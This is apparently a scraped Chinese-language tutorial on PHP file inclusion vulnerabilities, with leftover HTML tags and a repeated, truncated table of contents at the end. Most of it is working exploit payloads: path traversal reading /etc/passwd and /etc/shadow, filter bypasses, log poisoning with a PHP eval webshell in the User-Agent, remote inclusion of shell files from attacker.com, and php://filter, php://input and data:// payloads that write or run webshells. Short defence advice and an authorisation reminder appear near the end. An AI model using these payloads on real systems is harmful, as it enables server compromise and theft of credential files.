文件包含漏洞全面解析与实战利用<\/h1>

1. 文件包含漏洞概述<\/h2>
文件包含漏洞是Web应用程序中常见的安全漏洞，主要由于程序开发人员在设计时未对用户输入进行严格过滤，导致攻击者可以包含恶意文件并执行任意代码。<\/p>

2. 本地文件包含（LFI）<\/h2>

2.1 基本利用<\/h3>

通过文件包含功能查看服务器敏感文件：<\/p>

?<\/span>filename<\/span>=..\/..\/..\/..\/<\/span>etc<\/span>\/<\/span>passwd<\/span>
<\/span><\/span><\/code><\/pre>2.2 敏感文件路径<\/h3>
常见敏感文件路径：<\/p>

\/etc\/passwd<\/code> - 用户账户信息<\/li>
\/etc\/shadow<\/code> - 用户密码哈希<\/li>
\/var\/log\/apache2\/access.log<\/code> - Apache访问日志<\/li>
\/var\/lib\/php\/session\/sess_[sessionid]<\/code> - PHP会话文件<\/li>
<\/ul>
3. 本地文件包含绕过技术<\/h2>
3.1 常用绕过方法<\/h3>

路径长度截断<\/strong>：利用系统路径长度限制<\/li>
问号绕过<\/strong>：?filename=..\/..\/etc\/passwd?<\/code><\/li>
点号截断<\/strong>：....\/\/....\/\/etc\/passwd<\/code><\/li>
#号绕过<\/strong>：%23<\/code>（URL编码）<\/li>
空格绕过<\/strong>：在路径末尾添加空格<\/li>
00截断<\/strong>：%00<\/code>截断后续字符<\/li>
<\/ol>
3.2 日志文件包含GetShell<\/h3>
利用中间件日志文件包含获取Shell：<\/p>

上传恶意代码到日志<\/strong><\/li>
<\/ol>
User-Agent: <?php @eval($_REQUEST['cmd']);?>
<\/span><\/span><\/span><\/code><\/pre>
包含日志文件<\/strong><\/li>
<\/ol>
?<\/span>filename<\/span>=..\/..\/..\/..\/<\/span>var<\/span>\/<\/span>log<\/span>\/<\/span>apache2<\/span>\/<\/span>access<\/span>.<\/span>log<\/span>
<\/span><\/span><\/code><\/pre>
使用蚁剑连接<\/strong><\/li>
<\/ol>

URL：包含日志文件的路径<\/li>
编码器\/解码器：选择base64<\/li>
超时时间：设置为30000ms<\/li>
<\/ul>
4. Session文件包含<\/h2>
4.1 Session文件路径<\/h3>

Apache默认路径：\/tmp\/<\/code> 或 \/var\/lib\/php\/session\/<\/code><\/li>
Session文件名格式：sess_[sessionid]<\/code><\/li>
<\/ul>
4.2 利用方法<\/h3>

通过可控的Session内容写入恶意代码<\/li>
利用文件包含漏洞包含带有恶意代码的Session文件<\/li>
结合使用多个漏洞点完成攻击链<\/li>
<\/ol>
5. 远程文件包含（RFI）<\/h2>
5.1 利用条件<\/h3>
allow_url_fopen<\/span> =<\/span> On    ; 默认开启<\/span>
<\/span><\/span>allow_url_include<\/span> =<\/span> On  ; 默认关闭<\/span>
<\/span><\/span><\/code><\/pre>5.2 基本利用<\/h3>
?<\/span>filename<\/span>=<\/span>http<\/span>:\/\/<\/span>attacker<\/span>.<\/span>com<\/span>\/<\/span>shell<\/span>.<\/span>txt<\/span>
<\/span><\/span><\/code><\/pre>5.3 环境搭建<\/h3>

公网环境<\/strong>：使用云服务器托管恶意文件<\/li>
本地环境<\/strong>：利用本机HTTP服务（如phpstudy）<\/li>
<\/ul>
6. 远程文件包含绕过<\/h2>
6.1 绕过技术<\/h3>

#号绕过<\/strong>：%23<\/code><\/li>
问号绕过<\/strong>：直接使用?<\/code>或URL编码%3f<\/code><\/li>
00截断<\/strong>：%00<\/code><\/li>
<\/ol>
6.2 有效Payload示例<\/h3>
?<\/span>filename<\/span>=<\/span>http<\/span>:\/\/<\/span>attacker<\/span>.<\/span>com<\/span>\/<\/span>shell<\/span>.<\/span>txt<\/span>?<\/span>
<\/span><\/span>?<\/span>filename<\/span>=<\/span>http<\/span>:\/\/<\/span>attacker<\/span>.<\/span>com<\/span>\/<\/span>shell<\/span>.<\/span>txt<\/span>%<\/span>23<\/span>
<\/span><\/span>?<\/span>filename<\/span>=<\/span>http<\/span>:\/\/<\/span>attacker<\/span>.<\/span>com<\/span>\/<\/span>shell<\/span>.<\/span>txt<\/span>%<\/span>00<\/span>
<\/span><\/span><\/code><\/pre>7. PHP伪协议利用<\/h2>
7.1 php:\/\/filter伪协议<\/h3>
利用条件<\/h4>

存在文件操作函数（include、require等）<\/li>
参数用户可控且未严格过滤<\/li>
目标文件路径已知<\/li>
<\/ul>
读取文件内容<\/h4>
?<\/span>filename<\/span>=<\/span>php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>encode<\/span>\/<\/span>resource<\/span>=<\/span>config<\/span>.<\/span>php<\/span>
<\/span><\/span>?<\/span>filename<\/span>=<\/span>php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>read<\/span>=<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>encode<\/span>\/<\/span>resource<\/span>=<\/span>config<\/span>.<\/span>php<\/span>
<\/span><\/span><\/code><\/pre>Base64编码的作用<\/h4>

避免PHP标签被解析执行<\/li>
绕过"死亡exit"限制（<?php exit; ?><\/code>）<\/li>
兼容性强，适合网络传输<\/li>
<\/ol>
写入Shell<\/h4>
?<\/span>filename<\/span>=<\/span>php<\/span>:\/\/<\/span>filter<\/span>\/<\/span>write<\/span>=<\/span>convert<\/span>.<\/span>base64<\/span>-<\/span>decode<\/span>\/<\/span>resource<\/span>=<\/span>shell<\/span>.<\/span>php<\/span>
<\/span><\/span>&<\/span>str<\/span>=<\/span>PD9waHAgQGV2YWwoJF9SRVFVRVNUWydjbWQnXSk<\/span>\/<\/span>Pg<\/span>==<\/span>
<\/span><\/span><\/code><\/pre>7.2 php:\/\/input伪协议<\/h3>
利用条件<\/h4>

PHP版本 ≥ 5.2<\/li>
allow_url_fopen = On<\/code><\/li>
allow_url_include = On<\/code><\/li>
<\/ul>
直接执行PHP代码<\/h4>
POST<\/span> \/fi\/07.php?filename=php:\/\/input HTTP<\/span>\/<\/span>1.1<\/span>
<\/span><\/span>
<\/span><\/span><?php system('whoami');?>
<\/span><\/span><\/code><\/pre>7.3 file:\/\/伪协议<\/h3>
本地文件包含<\/h4>
?<\/span>filename<\/span>=<\/span>file<\/span>:\/\/\/<\/span>var<\/span>\/<\/span>log<\/span>\/<\/span>apache2<\/span>\/<\/span>access<\/span>.<\/span>log<\/span>
<\/span><\/span><\/code><\/pre>利用日志文件GetShell<\/h4>

将base64编码的Shell写入日志<\/li>
使用file:\/\/协议包含日志文件<\/li>
蚁剑连接时设置超时为30000ms<\/li>
<\/ol>
7.4 data:\/\/伪协议<\/h3>
利用条件<\/h4>

PHP版本 ≥ 5.2<\/li>
allow_url_fopen = On<\/code><\/li>
allow_url_include = On<\/code><\/li>
<\/ul>
直接执行代码<\/h4>
?<\/span>filename<\/span>=<\/span>data<\/span>:\/\/<\/span>text<\/span>\/<\/span>plain<\/span>,<?<\/span>php<\/span> phpinfo<\/span>();?><\/span>
<\/span><\/span><\/span>?filename=data:\/\/text\/plain;base64,PD9waHAgcGhwaW5mbygpOz8+
<\/span><\/span><\/span><\/code><\/pre>GetShell Payload<\/h4>
?<\/span>filename<\/span>=<\/span>data<\/span>:\/\/<\/span>text<\/span>\/<\/span>plain<\/span>;base64<\/span>,PD9waHAgQGV2YWwoJF9SRVFVRVNUWydjbWQnXSk<\/span>\/<\/span>Pg<\/span>==<\/span>
<\/span><\/span><\/code><\/pre>8. 实战技巧总结<\/h2>
8.1 信息收集<\/h3>

确定文件包含点位置<\/li>
识别过滤机制和WAF规则<\/li>
收集系统路径信息<\/li>
<\/ul>
8.2 漏洞利用流程<\/h3>

测试基本文件包含功能<\/li>
尝试各种绕过技术<\/li>
利用伪协议读取敏感信息<\/li>
通过日志或Session文件写入Shell<\/li>
使用管理工具连接目标服务器<\/li>
<\/ol>
8.3 工具使用要点<\/h3>

蚁剑配置<\/strong>：注意编码器和超时设置<\/li>
Burp Suite<\/strong>：使用Repeater模块测试Payload<\/li>
编码处理<\/strong>：合理使用base64编码绕过过滤<\/li>
<\/ul>
9. 防御建议<\/h2>

输入验证<\/strong>：严格过滤用户输入的路径参数<\/li>
白名单机制<\/strong>：只允许包含指定的安全文件<\/li>
禁用危险函数<\/strong>：关闭不必要的伪协议支持<\/li>
权限控制<\/strong>：Web服务器以最小权限运行<\/li>
安全配置<\/strong>：合理设置PHP安全参数<\/li>
<\/ol>
10. 注意事项<\/h2>

所有测试应在授权环境下进行<\/li>
遵守《中华人民共和国网络安全法》<\/li>
实际操作前充分测试和评估<\/li>
注意技术内容的时效性，及时更新知识<\/li>
<\/ul>
通过系统学习文件包含漏洞的各种利用技术和防御方法，安全研究人员可以更好地理解和防范此类安全威胁。<\/p>

文件包含漏洞全面解析与实战利用<\/h1>

1. 文件包含漏洞概述<\/h2> 文件包含漏洞是Web应用程序中常见的安全漏洞，主要由于程序开发人员在设计时未对用户输入进行严格过滤，导致攻击者可以包含恶意文件并执行任意代码。<\/p>

2. 本地文件包含（LFI）<\/h2>

3. 本地文件包含绕过技术<\/h2>

4. Session文件包含<\/h2>

5. 远程文件包含（RFI）<\/h2>

6. 远程文件包含绕过<\/h2>

7. PHP伪协议利用<\/h2>

7.1 php:\/\/filter伪协议<\/h3>

7.2 php:\/\/input伪协议<\/h3>

7.3 file:\/\/伪协议<\/h3>

7.4 data:\/\/伪协议<\/h3>

8. 实战技巧总结<\/h2>

1. 文件包含漏洞概述<\/h2>
文件包含漏洞是Web应用程序中常见的安全漏洞，主要由于程序开发人员在设计时未对用户输入进行严格过滤，导致攻击者可以包含恶意文件并执行任意代码。<\/p>